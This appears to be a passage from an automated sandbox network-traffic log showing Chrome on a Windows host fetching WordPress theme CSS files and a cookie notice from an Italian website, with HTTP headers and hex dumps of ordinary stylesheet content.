                                                                                                                                              2025-01-03 16:32:47 UTC11480INData Raw: 65 63 65 73 73 61 72 69 20 70 65 72 20 69 6c 20 66 75 6e 7a 69 6f 6e 61 6d 65 6e 74 6f 20 64 69 20 71 75 65 73 74 6f 20 73 69 74 6f 2e 20 50 65 72 20 74 75 74 74 69 20 67 6c 69 20 61 6c 74 72 69 20 74 69 70 69 20 64 69 20 63 6f 6f 6b 69 65 20 61 62 62 69 61 6d 6f 20 62 69 73 6f 67 6e 6f 20 64 65 6c 20 73 75 6f 20 70 65 72 6d 65 73 73 6f 2e 3c 62 72 20 2f 3e 0d 0a 3c 62 72 20 2f 3e 0d 0a 51 75 65 73 74 6f 20 73 69 74 6f 20 75 74 69 6c 69 7a 7a 61 20 64 69 76 65 72 73 69 20 74 69 70 69 20 64 69 20 63 6f 6f 6b 69 65 2e 20 41 6c 63 75 6e 69 20 63 6f 6f 6b 69 65 20 73 6f 6e 6f 20 63 6f 6c 6c 6f 63 61 74 65 20 64 61 20 73 65 72 76 69 7a 69 20 64 69 20 74 65 72 7a 69 20 63 68 65 20 63 6f 6d 70 61 69 6f 6e 6f 20 73 75 6c 6c 65 20 6e 6f 73 74 72 65 20 70 61 67 69
                                                                                                                                              Data Ascii: ecessari per il funzionamento di questo sito. Per tutti gli altri tipi di cookie abbiamo bisogno del suo permesso.<br /><br />Questo sito utilizza diversi tipi di cookie. Alcuni cookie sono collocate da servizi di terzi che compaiono sulle nostre pagi


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.2.164971289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:47 UTC584OUTGET /wp-content/themes/enfold/css/grid.css?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:48 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:48 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 9488
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:48 UTC9488INData Raw: 0a 2f 2a 20 54 61 62 6c 65 20 6f 66 20 43 6f 6e 74 65 6e 74 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 20 20 20 23 42 61 73 65 20 39 36 30 20 47 72 69 64 0a 20 20 20 20 23 54 61 62 6c 65 74 20 28 50 6f 72 74 72 61 69 74 29 0a 20 20 20 20 23 4d 6f 62 69 6c 65 20 28 50 6f 72 74 72 61 69 74 29 0a 20 20 20 20 23 4d 6f 62 69 6c 65 20 28 4c 61 6e 64 73 63 61 70 65 29 0a 20 20 20 20 23 43 6c 65 61 72 69 6e 67 20 2a 2f 0a 2f 2a 20 23 42 61 73 65 20 39 36 30 20 47 72 69 64 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 2a 2f 0a 68 74 6d 6c
                                                                                                                                              Data Ascii: /* Table of Contents================================================== #Base 960 Grid #Tablet (Portrait) #Mobile (Portrait) #Mobile (Landscape) #Clearing *//* #Base 960 Grid================================================== */html


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              2192.168.2.164971589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:47 UTC584OUTGET /wp-content/themes/enfold/css/base.css?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:48 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:48 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 19050
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:48 UTC16091INData Raw: 2f 2a 20 54 61 62 6c 65 20 6f 66 20 43 6f 6e 74 65 6e 74 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 09 23 52 65 73 65 74 20 26 20 42 61 73 69 63 73 0a 09 23 42 61 73 69 63 20 53 74 79 6c 65 73 0a 09 23 53 69 74 65 20 53 74 79 6c 65 73 0a 09 23 54 79 70 6f 67 72 61 70 68 79 0a 09 23 4c 69 6e 6b 73 0a 09 23 4c 69 73 74 73 0a 09 23 49 6d 61 67 65 73 0a 09 23 42 75 74 74 6f 6e 73 0a 09 23 46 6f 72 6d 73 0a 09 23 54 61 62 6c 65 0a 09 23 4d 69 73 63 0a 20 20 20 20 23 57 6f 72 64 50 72 65 73 73 20 47 65 6e 65 72 61 74 65 64 20 47 65 6e 65 72 69 63 73 0a 20 20 20 20 23 70 72 69 6e 74 20 73 74 79 6c 65 73 0a 2a 2f 0a 0a 2f 2a 20 23 52 65 73 65 74 20 26
                                                                                                                                              Data Ascii: /* Table of Content==================================================#Reset & Basics#Basic Styles#Site Styles#Typography#Links#Lists#Images#Buttons#Forms#Table#Misc #WordPress Generated Generics #print styles*//* #Reset &
                                                                                                                                              2025-01-03 16:32:48 UTC2959INData Raw: 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 7d 0a 23 74 6f 70 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 7d 0a 2e 62 6f 78 65 64 23 74 6f 70 7b 77 69 64 74 68 3a 31 30 30 25 7d 0a 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 0a 2e 75 6e 69 74 73 2c 2e 75 6e 69 74 7b 6d 61 72 67 69 6e 3a 30 7d 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 6f 6e 65 2e 75 6e 69 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 6f 6e 65 2e 75 6e 69 74 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 74 77 6f 2e 75 6e 69 74 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 74 68 72 65 65 2e 75 6e 69 74 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 66 6f 75 72 2e 75 6e 69 74 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 66 69 76 65 2e
                                                                                                                                              Data Ascii: tainer{width:100%}#top{overflow-x:hidden}.boxed#top{width:100%}.container{width:100%;margin:0 auto}.units,.unit{margin:0}.container .one.unit,.container .one.units,.container .two.units,.container .three.units,.container .four.units,.container .five.


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              3192.168.2.164971789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:48 UTC586OUTGET /wp-content/themes/enfold/css/layout.css?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:48 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:48 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 79923
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:48 UTC16091INData Raw: 2f 2a 20 54 61 62 6c 65 20 6f 66 20 43 6f 6e 74 65 6e 74 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 09 23 53 69 74 65 20 53 74 79 6c 65 73 0a 09 23 42 6c 6f 67 20 53 74 79 6c 65 73 0a 09 23 50 61 67 65 20 53 74 79 6c 65 73 0a 09 23 50 6f 73 74 20 46 6f 72 6d 61 74 73 0a 09 23 57 69 64 67 65 74 20 26 20 53 69 64 65 62 61 72 0a 09 23 46 6f 6f 74 65 72
                                                                                                                                              Data Ascii: /* Table of Content======================================================================================================================================================#Site Styles#Blog Styles#Page Styles#Post Formats#Widget & Sidebar#Footer
                                                                                                                                              2025-01-03 16:32:48 UTC16384INData Raw: 3a 73 6f 6c 69 64 3b 20 7d 0a 0a 2e 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 69 64 65 62 61 72 2e 68 74 6d 6c 5f 63 6f 6e 74 65 6e 74 5f 61 6c 69 67 6e 5f 6c 65 66 74 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 2e 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 69 64 65 62 61 72 2e 68 74 6d 6c 5f 63 6f 6e 74 65 6e 74 5f 61 6c 69 67 6e 5f 72 69 67 68 74 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 7d 0a 0a 2e 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 69 64 65 62 61 72 2e 68 74 6d 6c 5f 63 6f 6e 74 65 6e 74 5f 61 6c 69 67 6e 5f 6c 65 66 74 20 23 66 6f 6f 74 65 72 2c 20 2e 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 69 64 65 62 61 72 2e 68 74 6d 6c 5f 63 6f 6e 74 65 6e 74 5f 61 6c 69 67 6e 5f 72 69 67 68 74 20
                                                                                                                                              Data Ascii: :solid; }.html_header_sidebar.html_content_align_left .container {float:left;}.html_header_sidebar.html_content_align_right .container {float:right;}.html_header_sidebar.html_content_align_left #footer, .html_header_sidebar.html_content_align_right
                                                                                                                                              2025-01-03 16:32:48 UTC16384INData Raw: 77 69 64 74 68 3a 20 6e 6f 6e 65 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 69 6e 68 65 72 69 74 3b 0a 7d 0a 0a 23 74 6f 70 20 2e 61 76 2d 6d 61 69 6e 2d 6e 61 76 20 75 6c 20 75 6c 20 7b 0a 6c 65 66 74 3a 2d 32 30 37 70 78 3b 0a 74 6f 70 3a 30 70 78 3b 0a 6d 61 72 67 69 6e 3a 30 3b 0a 62 6f 72 64 65 72 2d 74 6f 70 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 0a 7d 0a 0a 2e 61 76 2d 6d 61 69 6e 2d 6e 61 76 20 6c 69 3a 68 6f 76 65 72 20 75 6c 20 75 6c 7b 20 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 7d 0a 23 74 6f 70 20 2e 61 76 2d 6d 61 69 6e 2d 6e 61 76 20 6c 69 3a 68 6f
                                                                                                                                              Data Ascii: width: none;text-decoration: none;font-family: inherit;}#top .av-main-nav ul ul {left:-207px;top:0px;margin:0;border-top-style: solid;border-top-width: 1px;padding-top: 0px}.av-main-nav li:hover ul ul{ display:none; }#top .av-main-nav li:ho
                                                                                                                                              2025-01-03 16:32:48 UTC16384INData Raw: 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 62 6f 72 64 65 72 2d 74 6f 70 2d 73 74 79 6c 65 3a 20 64 61 73 68 65 64 3b 0a 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 7d 0a 0a 23 74 6f 70 20 2e 73 75 62 5f 6d 65 6e 75 20 6c 69 20 6c 69 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 3e 20 61 20 7b 0a 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 0a 23 74 6f 70 20 2e 73 75 62 5f 6d 65 6e 75 20 6c 69 20 6c 69 20 61 3a 68 6f 76 65 72 7b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 38 66 38 66 38 3b 0a 7d 0a 0a 2f 2a 74 68 69 72 64 20 6c 65 76 65 6c 20 61 6e 64 20 64 65 65 70 65 72 2a 2f 0a 23 74 6f 70 20
                                                                                                                                              Data Ascii: xt-decoration: none;display: block;border-top-style: dashed;border-top-width: 1px;}#top .sub_menu li li:first-child > a {border: none;}#top .sub_menu li li a:hover{text-decoration: none;background: #f8f8f8;}/*third level and deeper*/#top
                                                                                                                                              2025-01-03 16:32:48 UTC14680INData Raw: 09 09 2e 72 65 73 70 6f 6e 73 69 76 65 20 2e 61 76 69 61 2d 63 6f 6f 6b 69 65 6d 65 73 73 61 67 65 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2c 0a 09 09 2e 72 65 73 70 6f 6e 73 69 76 65 20 2e 61 76 69 61 2d 63 6f 6f 6b 69 65 6d 65 73 73 61 67 65 2d 74 6f 70 2d 72 69 67 68 74 2c 0a 09 09 2e 72 65 73 70 6f 6e 73 69 76 65 20 2e 61 76 69 61 2d 63 6f 6f 6b 69 65 6d 65 73 73 61 67 65 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 7b 20 77 69 64 74 68 3a 20 33 35 25 3b 20 7d 0a 0a 0a 09 7d 0a 0a 09 2f 2a 20 54 61 62 6c 65 74 20 50 6f 72 74 72 61 69 74 20 73 69 7a 65 20 74 6f 20 73 74 61 6e 64 61 72 64 20 39 36 30 20 28 64 65 76 69 63 65 73 20 61 6e 64 20 62 72 6f 77 73 65 72 73 29 20 2a 2f 0a 09 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e
                                                                                                                                              Data Ascii: .responsive .avia-cookiemessage-bottom-left,.responsive .avia-cookiemessage-top-right,.responsive .avia-cookiemessage-bottom-right{ width: 35%; }}/* Tablet Portrait size to standard 960 (devices and browsers) */@media only screen and (min


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              4192.168.2.164971389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:48 UTC642OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:48 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:48 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 1385
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:48 UTC1385INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 41 56 49 41 20 50 4c 41 59 45 52 20 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================AVIA PLAYER ========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              5192.168.2.164971189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:48 UTC626OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/blog/blog.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:48 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:48 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 22078
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:48 UTC16091INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 23 42 6c 6f 67 20 53 74 79 6c 65 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================#Blog Styles========================================================================================
                                                                                                                                              2025-01-03 16:32:48 UTC5987INData Raw: 69 6d 70 6c 65 20 2e 6d 6f 72 65 2d 6c 69 6e 6b 2d 61 72 72 6f 77 3a 61 66 74 65 72 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 36 70 78 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 62 6c 6f 67 6c 69 73 74 2d 73 69 6d 70 6c 65 20 2e 72 65 61 64 2d 6d 6f 72 65 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 0a 09 6f 70 61 63 69 74 79 3a 20 31 3b 0a 7d 0a 0a 2e 74 65 6d 70 6c 61 74 65 2d 62 6c 6f 67 20 2e 62 6c 6f 67 6c 69 73 74 2d 73 69 6d 70 6c 65 20 2e 70 6f 73 74 5f 64 65 6c 69 6d 69 74 65 72 7b 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67
                                                                                                                                              Data Ascii: imple .more-link-arrow:after{font-size: 10px;line-height: 26px;display: block;padding: 0;text-align: center;}.bloglist-simple .read-more-link:hover{opacity: 1;}.template-blog .bloglist-simple .post_delimiter{border-bottom: 1px solid rg


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              6192.168.2.164971489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:48 UTC638OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/postslider/postslider.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:48 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:48 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 3911
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
